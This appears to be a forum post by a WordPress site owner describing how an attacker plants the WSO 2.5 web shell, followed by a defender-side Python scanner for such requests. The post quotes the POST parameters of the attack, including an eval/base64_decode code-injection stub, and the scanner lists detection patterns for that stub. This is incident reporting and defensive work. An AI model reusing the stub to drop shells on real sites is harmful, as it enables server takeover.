The hacker can create a file in the WordPress directory or in the wp-admin directory. The filename is always wnnnnnnnnw.php where n is a number, for example: w80998004w.php
This file contains the WSO shell 2.5.
Finally I found how the hacker can create this file.
He sends a POST command to the web server:
(you can find all parameters here: http://pastebin.com/FtSLxHQQ )
[a] => Php
[ajax] => true
[p1] => eval(base64_decode(str_replace(chr(32),chr(43),$_POST[chr(99)])));
[c] => TOO BIG TO PUT HERE
[showimg] => ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYyddKSk7
[w] => ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYyddKSk7
OK, if the permissions are correctly set, the file can't be created.
But I think there is a bug somewhere.
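
A defender-side check for the request described above, as an added example that is not part of the original post: it flags POST fields that carry PHP code in plain text or base64-encoded, and resolves chr() calls so the payload is readable. The function names and the pattern list are assumptions of this example, and the oversized `c` value is replaced by a constructed placeholder.

```python
import base64
import binascii
import re

# PHP idioms that have no business appearing in a form field (assumed list).
SUSPICIOUS = re.compile(
    r"\b(eval|assert|base64_decode|gzinflate)\s*\(|\$_(POST|GET|REQUEST|COOKIE)\b", re.I)
CHR_CALL = re.compile(r"chr\(\s*(\d{1,3})\s*\)", re.I)
B64_SHAPE = re.compile(r"[A-Za-z0-9+/ ]{16,}={0,2}")

def resolve_chr(text):
    """Replace chr(N) calls with the quoted character they produce."""
    return CHR_CALL.sub(lambda m: repr(chr(int(m.group(1)))), text)

def try_base64(value):
    """Return decoded text if value is valid base64 of printable ASCII, else None."""
    if not B64_SHAPE.fullmatch(value):
        return None
    try:
        # A '+' arrives as a space after URL decoding; undo that first.
        raw = base64.b64decode(value.replace(" ", "+"), validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None

def scan_post_params(params):
    """Return {param_name: readable PHP} for fields carrying PHP code."""
    findings = {}
    for name, value in params.items():
        for candidate in (value, try_base64(value)):
            if candidate and SUSPICIOUS.search(candidate):
                findings[name] = resolve_chr(candidate)
                break
    return findings

# Parameters as posted above; 'c' is a constructed placeholder for the omitted value.
SAMPLE = {
    "a": "Php",
    "ajax": "true",
    "p1": "eval(base64_decode(str_replace(chr(32),chr(43),$_POST[chr(99)])));",
    "c": "PLACEHOLDER",
    "showimg": "ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYyddKSk7",
    "w": "ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYyddKSk7",
}

if __name__ == "__main__":
    for name, php in scan_post_params(SAMPLE).items():
        print(f"{name}: {php}")
```

The same patterns can be run over logged request bodies or turned into a WAF rule that rejects any form field matching them.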